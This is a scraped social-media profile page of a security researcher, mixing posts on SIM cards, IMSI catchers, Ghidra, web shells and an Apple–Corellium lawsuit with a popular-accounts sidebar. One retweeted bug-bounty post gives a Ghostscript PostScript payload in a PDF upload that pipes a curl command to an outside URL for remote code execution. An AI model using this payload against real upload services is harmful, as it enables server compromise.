Olivia
Online
MaXe
@InterN0T
I'm an InterN0T'er.
The views and opinions here are my own and does not relate to anything that my employer does or will do.
The Internet
Joined May 2009
26 Following
2K Followers
5.8K Posts
Review and verify the effectiveness of the SMS Filters currently implemented within your system(s). (2/2)
Pro Tip: If you work at a Telco, maybe double check your installed TARs on your SIM cards one more time if you haven't tested them extensively. (1/2)
The PDF with all the security vulnerabilities I found in multiplayer games when I was an independent researcher from 2001 to 2012:
https://t.co/8KicbSyzP6
Who to follow
@[email protected]
@_staaldraad
Security researcher and breaker of things. &
@[email protected]
ς๏гєɭคภς0๔3г ([email protected]) 
@corelanc0d3r
Corelan | Infosec Researcher&Trainer, Hacker | Outgoing Introvert (INFJ-A) | Book lover | Fountain pen affictionado | Chess amateur | Foodie | 🖤
jcran
@jcran
knowledge seeker
@benkow_ It's very normal for web shells to have some sort of protection, i.e. require authentication. If you do some statistical analysis you can probably find out what type of "threat actor" commonly uses this specific authentication method.
@b0rk @rival_elf Furthermore, there are several other limitations you need to take care of for a real IMSI catcher to work, unless you buy the really expensive ones or implement one yourself. (i.e. Way beyond common guides, as 4G has mutual authentication between the client and the network.)
@b0rk @rival_elf The 30$ "IMSI catcher" which can only passively sniff data from existing cell towers, and only up to around 10 channels reliably, does not capture all IMSI in range either if you just turn it on and sniff, as it relies on location updates and other certain types of network events
@b0rk @rival_elf The $30 "IMSI catcher" is passive (i.e. relies on existing cell towers and how GSM works) and is not a cell tower / BTS.
A real IMSI catcher which is active, costs at least 300$ as you need a capable software defined radio that can transmit full duplex. (i.e. HackRF won't work)
For non-native readers, this is a writeup of my DEVCORE Conference 2019 talk. Describe a misconfiguration that exposed a magic service on port 3097 on our country's largest ISP, and how we find RCE on that to affect more than 250,000 modems :P https://t.co/3S1P6YZfir
Reverse Engineering & Code Emulation with Ghidra : https://t.co/bk3B6J9WVL (Slides)
Repo : A PCode Emulator for Ghidra : https://t.co/28Rx2Iro48 cc @kc0bfv
RCE on PDF upload:
Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"
Content-Type: application/pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl https://t.co/NhJ88DBQ2F) )
.putdeviceparams
quit
#BugBounty
Apple vs. Corellium
Unredacted version of Corellium’s legal answer is public https://t.co/JXoyk6yI8F
This entire lawsuit is an obvious attempt to decreases the value of Corellium to either
1) own them, or
2) put them out of business to prevent researchers from finding bugs
OffSec is hiring! We're looking for tech and training admins, a project editor, and a cyber security & policy engineer. These positions are remote. View the job descriptions on our Careers page: https://t.co/VjKCR1Ct7f
#techjobs #cybersecurityjobs
Reminder: Call for Papers for Black Hat Europe 2019 is now open. If you’d like an opportunity to present your research in London in December, get your submission in before August 19. #BHEU
Instead of going through a large codebase, sometimes I like to casually write some vulnerable C/C++ cases to play. Uploaded some to Github, hope this is fun for anybody interested in exploit dev: https://t.co/uTp2UKJry3
I have reverse-engineered Qualcomm’s Linux kernel interfaces and the DIAG protocol to enable verbose logging of things such as physics variables from the radio interface, RTOS complaints, and OTA signals with PLMN from the baseband; a big deal for this crazy blackbox
Previous low-q analyses of the RDP bug suggest that the real reason why some AV vendors jumped in first with an exploit demo is they caught the exploit in a honeypot, and repurposed shellcode to pop calc (which is trivial, as in copy-paste)
Note: I used to work at an AV vendor
Most Popular Users
Elon Musk
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.1M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.9M followers
Taylor Swift
@taylorswift13
80.7M followers
Lady Gaga
@ladygaga
72.3M followers
Kim Kardashian
@kimkardashian
69.4M followers
Virat Kohli
@imvkohli
68.7M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.3M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60M followers